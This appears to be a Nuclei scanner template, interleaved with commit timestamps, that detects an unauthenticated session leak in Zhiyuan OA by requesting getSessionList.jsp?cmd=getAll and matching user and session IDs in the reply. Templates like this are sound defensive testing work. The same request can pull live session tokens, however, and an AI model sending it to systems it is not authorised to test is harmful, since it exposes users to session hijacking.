2021-02-24 08:06:28 +00:00
id : zhiyuan-oa-session-leak
info :
2021-10-26 12:24:26 +00:00
name : Zhiyuan OA Session Leak
2021-02-24 08:06:28 +00:00
author : pikpikcu
severity : medium
2021-10-26 12:24:26 +00:00
description : A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
2022-04-22 10:38:41 +00:00
reference :
- https://www.zhihuifly.com/t/topic/3345
2021-02-24 08:06:28 +00:00
tags : zhiyuan,leak,disclosure
requests :
- method : GET
path :
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
matchers-condition : and
matchers :
- type : word
words :
- "<usrID>"
- "<sessionID>"
condition : and
- type : status
status :
- 200